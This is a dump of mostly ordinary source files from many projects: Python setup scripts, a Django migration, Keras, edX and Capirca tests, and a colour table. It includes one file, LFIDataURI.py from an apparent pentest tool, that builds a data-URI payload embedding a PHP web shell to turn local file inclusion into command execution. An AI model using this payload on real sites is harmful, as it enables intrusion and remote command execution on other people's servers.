self.data = format_error("config_exception", "Invalid config " + arg)
self.code = 400
def log_exception(sender, exception, **extra):
logger = logging.getLogger(__name__)
message = ""
if hasattr(exception, "data") and "message" in exception.data:
message = exception.data['message']
error = '{} {} {}'.format(exception.__class__.__name__, message, request.url)
if isinstance(exception, (HTTPException, RegionNotFound)):
logger.debug(error)
if exception.code >= 500:
record_exception()
else:
logger.exception(error)
record_exception()
|
srkunze/xcache
|
setup.py
|
Python
|
mit
| 573
| 0
|
#!/usr/bin/env python
from __future__ import unicode_literals
from setuptools import setup
setup(
name='xcache',
version='0.2',
description='clean caches when needed',
author='Sven R. Kunze',
author_email='srkunze@mail.de',
    url='https://github.com/srkunze/xcache',
license='MIT',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
],
py_modules=['xcache'],
install_requires=[],
)
|
pombredanne/1trillioneuros
|
webapp/currency/migrations/0001_initial.py
|
Python
|
gpl-3.0
| 1,131
| 0.006189
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Currency'
db.create_table(u'currency_currency', (
('iso_code', self.gf('django.db.models.fields.CharField')(max_length=3, primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=120)),
('rate', self.gf('django.db.models.fields.FloatField')()),
))
        db.send_create_signal(u'currency', ['Currency'])
def backwards(self, orm):
# Deleting model 'Currency'
db.delete_table(u'currency_currency')
models = {
u'currency.currency': {
'Meta': {'object_name': 'Currency'},
|
'iso_code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'rate': ('django.db.models.fields.FloatField', [], {}),
}
}
complete_apps = ['currency']
|
uw-it-aca/spacescout_web
|
spacescout_web/tests.py
|
Python
|
apache-2.0
| 152
| 0
|
from django.utils import unittest
from spacescout_web.test.not_found import NotFound404Test
from spacescout_web.test.url_filtering import URLFiltering
|
kisel/trex-core
|
scripts/astf/param_tcp_rxbufsize_8k.py
|
Python
|
apache-2.0
| 1,298
| 0.006163
|
from trex_astf_lib.api import *
# IPV6 tunable example
#
# ipv6.src_msb
# ipv6.dst_msb
# ipv6.enable
#
class Prof1():
def __init__(self):
pass
def get_profile(self, **kwargs):
# ip generator
ip_gen_c = ASTFIPGenDist(ip_range=["16.0.0.0", "16.0.0.255"], distribution="seq")
        ip_gen_s = ASTFIPGenDist(ip_range=["48.0.0.0", "48.0.255.255"], distribution="seq")
ip_gen = ASTFIPGen(glob=ASTFIPGenGlobal(ip_offset="1.0.0.0"),
dist_client=ip_gen_c,
dist_server=ip_gen_s)
c_glob_info = ASTFGlobalInfo()
c_glob_info.tcp.rxbufsize = 8*1024
c_glob_info.tcp.txbufsize = 8*1024
s_glob_info = ASTFGlobalInfo()
        s_glob_info.tcp.rxbufsize = 8*1024
s_glob_info.tcp.txbufsize = 8*1024
return ASTFProfile(default_ip_gen=ip_gen,
# Defaults affects all files
default_c_glob_info=c_glob_info,
default_s_glob_info=s_glob_info,
cap_list=[
ASTFCapInfo(file="../avl/delay_10_http_browsing_0.pcap", cps=1)
]
)
def register():
return Prof1()
|
stvstnfrd/edx-platform
|
lms/djangoapps/discussion/django_comment_client/tests/test_utils.py
|
Python
|
agpl-3.0
| 78,549
| 0.002928
|
# pylint: skip-file
import datetime
import json
import sys
from unittest import mock
from unittest.mock import Mock, patch
import ddt
import pytest
from django.test import RequestFactory, TestCase
from django.urls import reverse
from edx_django_utils.cache import RequestCache
from opaque_keys.edx.keys import CourseKey
from pytz import UTC
import lms.djangoapps.discussion.django_comment_client.utils as utils
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.course_modes.tests.factories import CourseModeFactory
from common.djangoapps.student.roles import CourseStaffRole
from common.djangoapps.student.tests.factories import AdminFactory, CourseEnrollmentFactory, UserFactory
from lms.djangoapps.courseware.tabs import get_course_tab_list
from lms.djangoapps.courseware.tests.factories import InstructorFactory
from lms.djangoapps.discussion.django_comment_client.constants import TYPE_ENTRY, TYPE_SUBCATEGORY
from lms.djangoapps.discussion.django_comment_client.tests.factories import RoleFactory
from lms.djangoapps.discussion.django_comment_client.tests.unicode import UnicodeTestMixin
from lms.djangoapps.discussion.django_comment_client.tests.utils import config_course_discussions, topic_name_to_id
from lms.djangoapps.teams.tests.factories import CourseTeamFactory
from openedx.core.djangoapps.course_groups import cohorts
from openedx.core.djangoapps.course_groups.cohorts import set_course_cohorted
from openedx.core.djangoapps.course_groups.tests.helpers import CohortFactory, config_course_cohorts
from openedx.core.djangoapps.django_comment_common.comment_client.utils import (
CommentClientMaintenanceError,
perform_request
)
from openedx.core.djangoapps.django_comment_common.models import (
CourseDiscussionSettings,
DiscussionsIdMapping,
ForumsConfig,
assign_role
)
from openedx.core.djangoapps.django_comment_common.utils import (
get_course_discussion_settings,
seed_permissions_roles,
set_course_discussion_settings
)
from openedx.core.djangoapps.util.testing import ContentGroupTestCase
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import TEST_DATA_MIXED_MODULESTORE, ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory, ToyCourseFactory
class DictionaryTestCase(TestCase):
def test_extract(self):
d = {'cats': 'meow', 'dogs': 'woof'}
k = ['cats', 'dogs', 'hamsters']
expected = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
assert utils.extract(d, k) == expected
def test_strip_none(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
expected = {'cats': 'meow', 'dogs': 'woof'}
assert utils.strip_none(d) == expected
def test_strip_blank(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': ' ', 'yetis': ''}
expected = {'cats': 'meow', 'dogs': 'woof'}
assert utils.strip_blank(d) == expected
class AccessUtilsTestCase(ModuleStoreTestCase):
"""
Base testcase class for access and roles for the
comment client service integration
"""
CREATE_USER = False
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
self.course_id = self.course.id
self.student_role = RoleFactory(name='Student', course_id=self.course_id)
self.moderator_role = RoleFactory(name='Moderator', course_id=self.course_id)
self.community_ta_role = RoleFactory(name='Community TA', course_id=self.course_id)
self.student1 = UserFactory(username='student', email='student@edx.org')
self.student1_enrollment = CourseEnrollmentFactory(user=self.student1)
self.student_role.users.add(self.student1)
self.student2 = UserFactory(username='student2', email='student2@edx.org')
self.student2_enrollment = CourseEnrollmentFactory(user=self.student2)
self.moderator = UserFactory(username='moderator', email='staff@edx.org', is_staff=True)
self.moderator_enrollment = CourseEnrollmentFactory(user=self.moderator)
self.moderator_role.users.add(self.moderator)
self.community_ta1 = UserFactory(username='community_ta1', email='community_ta1@edx.org')
self.community_ta_role.users.add(self.community_ta1)
self.community_ta2 = UserFactory(username='community_ta2', email='community_ta2@edx.org')
self.community_ta_role.users.add(self.community_ta2)
self.course_staff = UserFactory(username='course_staff', email='course_staff@edx.org')
CourseStaffRole(self.course_id).add_users(self.course_staff)
def test_get_role_ids(self):
ret = utils.get_role_ids(self.course_id)
expected = {'Moderator': [3], 'Community TA': [4, 5]}
assert ret == expected
def test_has_discussion_privileges(self):
assert not utils.has_discussion_privileges(self.student1, self.course_id)
assert not utils.has_discussion_privileges(self.student2, self.course_id)
assert not utils.has_discussion_privileges(self.course_staff, self.course_id)
assert utils.has_discussion_privileges(self.moderator, self.course_id)
assert utils.has_discussion_privileges(self.community_ta1, self.course_id)
assert utils.has_discussion_privileges(self.community_ta2, self.course_id)
    def test_has_forum_access(self):
ret = utils.has_forum_access('student', self.course_id, 'Student')
assert ret
ret = utils.has_forum_access('not_a_student', self.course_id, 'Student')
assert not ret
        ret = utils.has_forum_access('student', self.course_id, 'NotARole')
assert not ret
@ddt.ddt
class CoursewareContextTestCase(ModuleStoreTestCase):
"""
Base testcase class for courseware context for the
comment client service integration
"""
def setUp(self):
super().setUp()
self.course = CourseFactory.create(org="TestX", number="101", display_name="Test Course")
self.discussion1 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion1",
discussion_category="Chapter",
discussion_target="Discussion 1"
)
self.discussion2 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion2",
discussion_category="Chapter / Section / Subsection",
discussion_target="Discussion 2"
)
def test_empty(self):
utils.add_courseware_context([], self.course, self.user)
def test_missing_commentable_id(self):
orig = {"commentable_id": "non-inline"}
modified = dict(orig)
utils.add_courseware_context([modified], self.course, self.user)
assert modified == orig
def test_basic(self):
threads = [
{"commentable_id": self.discussion1.discussion_id},
{"commentable_id": self.discussion2.discussion_id}
]
utils.add_courseware_context(threads, self.course, self.user)
def assertThreadCorrect(thread, discussion, expected_title): # pylint: disable=invalid-name
"""Asserts that the given thread has the expected set of properties"""
assert set(thread.keys()) == set(['commentable_id', 'courseware_url', 'courseware_title'])
assert thread.get('courseware_url') == reverse('jump_to', kwargs={'course_id': str(self.course.id), 'location': str(discussion.location)})
assert thread.get('courseware_title') == expected_title
assertThreadCorrect(threads[0], self.discussion1, "Chapter / Discussion 1")
assertThreadCorrect(threads[1], self.discussion2, "Subsection / Discussion 2")
def test_empty_discussion_subcategory_title(self):
"""
Test that for empty subcategory inline discussion modules,
the divider " / " is not rendered on a post or inline discussion topic label.
"""
discussion = ItemFactory.create(
|
eteq/ginga
|
ginga/colors.py
|
Python
|
bsd-3-clause
| 48,361
| 0.000186
|
#
# colors.py -- color definitions
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import re
color_dict = {
'aliceblue': (0.9411764705882353, 0.9725490196078431, 1.0),
'antiquewhite': (0.9803921568627451, 0.9215686274509803, 0.8431372549019608),
'antiquewhite1': (1.0, 0.9372549019607843, 0.8588235294117647),
'antiquewhite2': (0.9333333333333333, 0.8745098039215686, 0.8),
'antiquewhite3': (0.803921568627451, 0.7529411764705882, 0.6901960784313725),
'antiquewhite4': (0.5450980392156862,
0.5137254901960784,
0.47058823529411764),
'aquamarine': (0.4980392156862745, 1.0, 0.8313725490196079),
'aquamarine1': (0.4980392156862745, 1.0, 0.8313725490196079),
'aquamarine2': (0.4627450980392157, 0.9333333333333333, 0.7764705882352941),
'aquamarine3': (0.4, 0.803921568627451, 0.6666666666666666),
'aquamarine4': (0.27058823529411763, 0.5450980392156862, 0.4549019607843137),
'azure': (0.9411764705882353, 1.0, 1.0),
'azure1': (0.9411764705882353, 1.0, 1.0),
'azure2': (0.8784313725490196, 0.9333333333333333, 0.9333333333333333),
'azure3': (0.7568627450980392, 0.803921568627451, 0.803921568627451),
'azure4': (0.5137254901960784, 0.5450980392156862, 0.5450980392156862),
'beige': (0.9607843137254902, 0.9607843137254902, 0.8627450980392157),
'bisque': (1.0, 0.8941176470588236, 0.7686274509803922),
'bisque1': (1.0, 0.8941176470588236, 0.7686274509803922),
'bisque2': (0.9333333333333333, 0.8352941176470589, 0.7176470588235294),
'bisque3': (0.803921568627451, 0.7176470588235294, 0.6196078431372549),
'bisque4': (0.5450980392156862, 0.49019607843137253, 0.4196078431372549),
'black': (0.0, 0.0, 0.0),
'blanchedalmond': (1.0, 0.9215686274509803, 0.803921568627451),
'blue': (0.0, 0.0, 1.0),
'blue1': (0.0, 0.0, 1.0),
'blue2': (0.0, 0.0, 0.9333333333333333),
'blue3': (0.0, 0.0, 0.803921568627451),
'blue4': (0.0, 0.0, 0.5450980392156862),
'blueviolet': (0.5411764705882353, 0.16862745098039217, 0.8862745098039215),
'brown': (0.6470588235294118, 0.16470588235294117, 0.16470588235294117),
'brown1': (1.0, 0.25098039215686274, 0.25098039215686274),
'brown2': (0.9333333333333333, 0.23137254901960785, 0.23137254901960785),
'brown3': (0.803921568627451, 0.2, 0.2),
'brown4': (0.5450980392156862, 0.13725490196078433, 0.13725490196078433),
'burlywood': (0.8705882352941177, 0.7215686274509804, 0.5294117647058824),
'burlywood1': (1.0, 0.8274509803921568, 0.6078431372549019),
'burlywood2': (0.9333333333333333, 0.7725490196078432, 0.5686274509803921),
'burlywood3': (0.803921568627451, 0.6666666666666666, 0.49019607843137253),
'burlywood4': (0.5450980392156862, 0.45098039215686275, 0.3333333333333333),
'cadetblue': (0.37254901960784315, 0.6196078431372549, 0.6274509803921569),
'cadetblue1': (0.596078431372549, 0.9607843137254902, 1.0),
'cadetblue2': (0.5568627450980392, 0.8980392156862745, 0.9333333333333333),
'cadetblue3': (0.47843137254901963, 0.7725490196078432, 0.803921568627451),
'cadetblue4': (0.3254901960784314, 0.5254901960784314, 0.5450980392156862),
'chartreuse': (0.4980392156862745, 1.0, 0.0),
'chartreuse1': (0.4980392156862745, 1.0, 0.0),
'chartreuse2': (0.4627450980392157, 0.9333333333333333, 0.0),
'chartreuse3': (0.4, 0.803921568627451, 0.0),
'chartreuse4': (0.27058823529411763, 0.5450980392156862, 0.0),
'chocolate': (0.8235294117647058, 0.4117647058823529, 0.11764705882352941),
'chocolate1': (1.0, 0.4980392156862745, 0.1411764705882353),
'chocolate2': (0.9333333333333333, 0.4627450980392157, 0.12941176470588237),
'chocolate3': (0.803921568627451, 0.4, 0.11372549019607843),
'chocolate4': (0.5450980392156862, 0.27058823529411763, 0.07450980392156863),
'coral': (1.0, 0.4980392156862745, 0.3137254901960784),
'coral1': (1.0, 0.4470588235294118, 0.33725490196078434),
'coral2': (0.9333333333333333, 0.41568627450980394, 0.3137254901960784),
'coral3': (0.803921568627451, 0.3568627450980392, 0.27058823529411763),
'coral4': (0.5450980392156862, 0.24313725490196078, 0.1843137254901961),
'cornflowerblue': (0.39215686274509803,
0.5843137254901961,
0.9294117647058824),
'cornsilk': (1.0, 0.9725490196078431, 0.8627450980392157),
'cornsilk1': (1.0, 0.9725490196078431, 0.8627450980392157),
'cornsilk2': (0.9333333333333333, 0.9098039215686274, 0.803921568627451),
'cornsilk3': (0.803921568627451, 0.7843137254901961, 0.6941176470588235),
'cornsilk4': (0.5450980392156862, 0.5333333333333333, 0.47058823529411764),
'cyan': (0.0, 1.0, 1.0),
'cyan1': (0.0, 1.0, 1.0),
'cyan2': (0.0, 0.9333333333333333, 0.9333333333333333),
'cyan3': (0.0, 0.803921568
|
627451, 0.803921568627451),
'cyan4': (0.0, 0.5450980392156862, 0.5450980392156862),
'darkblue': (0.0, 0.0, 0.5450980392156862),
'darkcyan': (0.0, 0.5450980392156862, 0.5450980392156862),
'darkgoldenrod': (0.7215686274509804,
0.5254901960784314,
|
0.043137254901960784),
'darkgoldenrod1': (1.0, 0.7254901960784313, 0.058823529411764705),
'darkgoldenrod2': (0.9333333333333333,
0.6784313725490196,
0.054901960784313725),
'darkgoldenrod3': (0.803921568627451,
0.5843137254901961,
0.047058823529411764),
'darkgoldenrod4': (0.5450980392156862,
0.396078431372549,
0.03137254901960784),
'darkgray': (0.6627450980392157, 0.6627450980392157, 0.6627450980392157),
'darkgreen': (0.0, 0.39215686274509803, 0.0),
'darkgrey': (0.6627450980392157, 0.6627450980392157, 0.6627450980392157),
'darkkhaki': (0.7411764705882353, 0.7176470588235294, 0.4196078431372549),
'darkmagenta': (0.5450980392156862, 0.0, 0.5450980392156862),
'darkolivegreen': (0.3333333333333333,
0.4196078431372549,
0.1843137254901961),
'darkolivegreen1': (0.792156862745098, 1.0, 0.4392156862745098),
'darkolivegreen2': (0.7372549019607844,
0.9333333333333333,
0.40784313725490196),
'darkolivegreen3': (0.6352941176470588,
0.803921568627451,
0.35294117647058826),
'darkolivegreen4': (0.43137254901960786,
0.5450980392156862,
0.23921568627450981),
'darkorange': (1.0, 0.5490196078431373, 0.0),
'darkorange1': (1.0, 0.4980392156862745, 0.0),
'darkorange2': (0.9333333333333333, 0.4627450980392157, 0.0),
'darkorange3': (0.803921568627451, 0.4, 0.0),
'darkorange4': (0.5450980392156862, 0.27058823529411763, 0.0),
'darkorchid': (0.6, 0.19607843137254902, 0.8),
'darkorchid1': (0.7490196078431373, 0.24313725490196078, 1.0),
'darkorchid2': (0.6980392156862745, 0.22745098039215686, 0.9333333333333333),
'darkorchid3': (0.6039215686274509, 0.19607843137254902, 0.803921568627451),
'darkorchid4': (0.40784313725490196, 0.13333333333333333, 0.5450980392156862),
'darkred': (0.5450980392156862, 0.0, 0.0),
'darksalmon': (0.9137254901960784, 0.5882352941176471, 0.47843137254901963),
'darkseagreen': (0.5607843137254902, 0.7372549019607844, 0.5607843137254902),
'darkseagreen1': (0.7568627450980392, 1.0, 0.7568627450980392),
'darkseagreen2': (0.7058823529411765, 0.9333333333333333, 0.7058823529411765),
'darkseagreen3': (0.6078431372549019, 0.803921568627451, 0.6078431372549019),
'darkseagreen4': (0.4117647058823529, 0.5450980392156862, 0.4117647058823529),
'darkslateblue': (0.2823529411764706,
0.23921568627450981,
0.5450980392156862),
'darkslategray': (0.1843137254901961,
0.30980392156862746,
0.30980392156862746),
'darkslategray1': (0.592156862745098, 1.0, 1.0),
'darkslategray2': (0.5529411764705883,
0.9333333333333333,
0.9333333333333333),
'darkslategray3': (0.4745098039215686, 0.803921568627451, 0.803921568627451),
'darkslategray4': (0.3215686274509804,
0.5450980392156862,
0.5450980392156862),
'darkslategrey': (0.1843137254901
|
MostlyOpen/odoo_addons
|
myo_base/__openerp__.py
|
Python
|
agpl-3.0
| 1,788
| 0
|
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'Base Module',
'summary': 'Base Module used by MostlyOpen Solutions.',
'version': '2.0.0',
'author': 'Carlos Eduardo Vercelino - CLVsol',
'cate
|
gory': 'Generic Modules/Others',
'license': 'AGPL-3',
'website': 'http://mostlyopen.org',
'depends': ['base'],
'data': [
'security/base_security.xml',
'views/base_menu_view.xml',
'views/groupings_menu_view.xml',
'views/agro_menu_view.xml',
'vi
|
ews/community_menu_view.xml',
'views/health_menu_view.xml',
'views/insurance_menu_view.xml',
'views/pharmacy_menu_view.xml',
'views/mfmng_menu_view.xml',
'views/res_users_view.xml',
],
'demo': [],
'test': [],
'init_xml': [],
'update_xml': [],
'installable': True,
'application': False,
'active': False,
'css': [],
}
|
m101/lfipwn
|
core/techniques/LFIDataURI.py
|
Python
|
agpl-3.0
| 1,128
| 0.018617
|
from core.techniques.LFIExec import LFIExec
from base64 import b64encode
class LFIDataURI (LFIExec):
files_exec = [
# input
{ 'path' : '', 'type' : 'data_uri' },
]
# find LFI code execution path
def check (self):
return super(LFIDataURI, self)._check (prepare_check_data_uri)
# do exec
def exploit (self, cmd):
return super(LFIDataURI, self)._exploit (prepare_exec_data_uri, cmd)
def prepare_check_data_uri (lfi, payload):
purl = lfi.pattern_url[:]
payload = 'data:text/plain;base64,' + b64encode (payload)
# payload = 'data:text/plain,' + payload
url = purl.replace (lfi.payload_placeholder, payload)
return url
def prepare_exec_data_ur
|
i (lfi, cmd):
purl = lfi.pattern_url[:]
payload_exec = '<?php echo "' + lfi.tag_start_exec + '"; system ($_GET["cmd"]); echo "' + lfi.t
|
ag_end_exec + '"; ?>'
payload = 'data:text/plain;base64,{0}&cmd={1}'.format (b64encode (payload_exec), cmd)
# payload = 'data:text/plain,{0}&cmd={1}'.format (payload_exec, cmd)
url = purl.replace (lfi.payload_placeholder, payload)
return url
|
frreiss/tensorflow-fred
|
tensorflow/python/keras/engine/deferred_sequential_test.py
|
Python
|
apache-2.0
| 8,563
| 0.003503
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests specific to deferred-build `Sequential` models."""
import os
import unittest
import numpy as np
from tensorflow.python import keras
from tensorflow.python.compat import v2_compat
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestDeferredSequential(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_build_behavior(self):
# Test graph network creation after __call__
model = get_model()
model(np.random.random((2, 6)))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [2, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [2, 2])
# Test effect of new __call__ with a different shape
model(np.random.random((3, 6)))
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
model(np.random.random((4, 6)))
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
# Test graph network creation after build
model = get_model()
model.build((None, 6))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
# Test graph network creation after compile/fit
model = get_model()
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy()],
run_eagerly=testing_utils.should_run_eagerly())
model.fit(np.zeros((2, 6)), np.zeros((2, 2)))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
# Inconsistency here: with eager `fit`, the model is built with shape
# (2, 6), but with graph function `fit`, it is built with shape `(None, 6)`.
# This is likely due to our assumption "the batch size should be dynamic"
# at the level of `Model`. TODO(fchollet): investigate and resolve.
self.assertEqual(model.inputs[0].shape.as_list()[-1], 6)
self.assertEqual(model.outputs[0].shape.as_list()[-1], 2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_add_and_pop(self):
model = get_model()
model.build((None, 6))
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 3)
self.assertLen(model.weights, 4)
model.pop()
self.assertTrue(model.bu
|
ilt)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layer
|
s, 2)
self.assertLen(model.weights, 2)
model.add(keras.layers.Dense(2))
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 3)
self.assertLen(model.weights, 4)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_feature_extraction(self):
# This tests layer connectivity reset when rebuilding
model = get_model()
model(np.random.random((3, 6))) # First build
model(np.random.random((4, 6))) # Triggers a rebuild
# Classic feature extractor pattern
extractor = keras.Model(inputs=model.inputs,
outputs=[layer.output for layer in model.layers])
# Check that inputs and outputs are connected
_ = extractor(np.random.random((4, 6)))
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_saving_savedmodel(self):
model = get_model()
model(np.random.random((3, 6))) # Build model
path = os.path.join(self.get_temp_dir(), 'model_path')
model.save(path)
new_model = keras.models.load_model(path)
model_layers = model._flatten_layers(include_self=True, recursive=False)
new_model_layers = new_model._flatten_layers(
include_self=True, recursive=False)
for layer1, layer2 in zip(model_layers, new_model_layers):
self.assertEqual(layer1.name, layer2.name)
for w1, w2 in zip(layer1.weights, layer2.weights):
self.assertAllClose(w1, w2)
@unittest.skipIf(h5py is None, 'Test requires h5py')
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_saving_h5(self):
path = os.path.join(self.get_temp_dir(), 'model_path.h5')
model = get_model()
model(np.random.random((3, 6))) # Build model
path = os.path.join(self.get_temp_dir(), 'model_path.h5')
model.save(path)
new_model = keras.models.load_model(path)
model_layers = model._flatten_layers(include_self=True, recursive=False)
new_model_layers = new_model._flatten_layers(
include_self=True, recursive=False)
for layer1, layer2 in zip(model_layers, new_model_layers):
self.assertEqual(layer1.name, layer2.name)
for w1, w2 in zip(layer1.weights, layer2.weights):
self.assertAllClose(w1, w2)
@keras_parameterized.run_all_keras_modes
def test_shared_layer(self):
# This tests that preexisting layer connectivity is preserved
# when auto-building graph networks
shared_layer = keras.layers.Dense(2)
m1 = keras.Sequential([shared_layer])
m1(np.random.random((3, 6)))
m2 = keras.Sequential([shared_layer])
m2(np.random.random((3, 6)))
# Nesting case
shared_layer = keras.layers.Dense(2)
m1 = keras.Sequential([shared_layer])
m2 = keras.Sequential([shared_layer, m1])
m2(np.random.random((3, 2)))
@keras_parameterized.run_all_keras_modes
def test_loss_layer(self):
class LossLayer(keras.layers.Layer):
def call(self, inputs):
self.add_loss(math_ops.reduce_sum(inputs))
return inputs
# Test loss layer alone
model = keras.Sequential([LossLayer()])
model.compile('rmsprop', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)))
self.assertAllClose(loss, 4.)
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)))
self.assertAllClose(loss, 2.)
# Test loss layer combined with another layer
model = keras.Sequential([
keras.layers.Dense(1, kernel_initializer='ones'),
LossLayer()])
model.compile('rmsprop', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)))
self.assertAllClose(loss, 4.)
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)))
self.assertLess(loss, 2.)
# Test loss layer combined with external loss
model = keras.Sequential([
keras.layers.Dense(1, kernel_initializer='ones'),
LossLayer()])
model.compile('rmsprop', 'mse',
run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)), np.ones((2, 2)))
model(np.random.random((4, 2))) # Trigger
|
ryantierney513/capirca
|
tests/lib/cisco_test.py
|
Python
|
apache-2.0
| 23,978
| 0.001877
|
# Copyright 2008 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licens
|
es/LICENSE-2.0
#
# unless required by applicable law or agreed to i
|
n writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittest for cisco acl rendering module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import re
import unittest
from lib import aclgenerator
from lib import cisco
from lib import nacaddr
from lib import naming
from lib import policy
import mock
GOOD_HEADER = """
header {
comment:: "this is a test acl"
target:: cisco test-filter
}
"""
GOOD_STANDARD_HEADER_1 = """
header {
comment:: "this is a standard acl"
target:: cisco 99 standard
}
"""
GOOD_STANDARD_HEADER_2 = """
header {
comment:: "this is a standard acl"
target:: cisco FOO standard
}
"""
GOOD_STANDARD_NUMBERED_HEADER = """
header {
comment:: "numbered standard"
target:: cisco 50 standard
}
"""
GOOD_OBJGRP_HEADER = """
header {
comment:: "obj group header test"
target:: cisco objgroupheader object-group
}
"""
GOOD_INET6_HEADER = """
header {
comment:: "inet6 header test"
target:: cisco inet6_acl inet6
}
"""
GOOD_MIXED_HEADER = """
header {
comment:: "mixed inet/inet6 header test"
target:: cisco mixed_acl mixed
}
"""
GOOD_DSMO_HEADER = """
header {
comment:: "this is a dsmo test acl"
target:: cisco dsmo_acl extended enable_dsmo
}
"""
GOOD_EXTENDED_NUMBERED_HEADER = """
header {
comment:: "numbered extended"
target:: cisco 150 extended
}
"""
BAD_STANDARD_HEADER_1 = """
header {
comment:: "this is a standard acl"
target:: cisco 2001 standard
}
"""
BAD_STANDARD_HEADER_2 = """
header {
comment:: "this is a standard acl"
target:: cisco 101 standard
}
"""
BAD_HEADER = """
header {
comment:: "this is a test acl"
target:: juniper test-filter
}
"""
BAD_HEADER_2 = """
header {
target:: cisco 1300
}
"""
GOOD_STANDARD_TERM_1 = """
term standard-term-1 {
address:: SOME_HOST
action:: accept
}
"""
GOOD_STANDARD_TERM_2 = """
term standard-term-2 {
address:: SOME_HOST
action:: accept
}
"""
BAD_STANDARD_TERM_1 = """
term bad-standard-term-1 {
destination-address:: SOME_HOST
protocol:: tcp
action:: accept
}
"""
UNSUPPORTED_TERM_1 = """
term protocol_except_term {
protocol-except:: tcp udp icmp
action:: reject
}
"""
UNSUPPORTED_TERM_2 = """
term protocol_except_term {
source-prefix:: configured-neighbors-only
action:: reject
}
"""
EXPIRED_TERM = """
term is_expired {
expiration:: 2001-01-01
action:: accept
}
"""
EXPIRING_TERM = """
term is_expiring {
expiration:: %s
action:: accept
}
"""
GOOD_TERM_1 = """
term good-term-1 {
protocol:: icmp
action:: accept
}
"""
GOOD_TERM_2 = """
term good-term-2 {
protocol:: tcp
destination-address:: SOME_HOST
source-port:: HTTP
option:: established
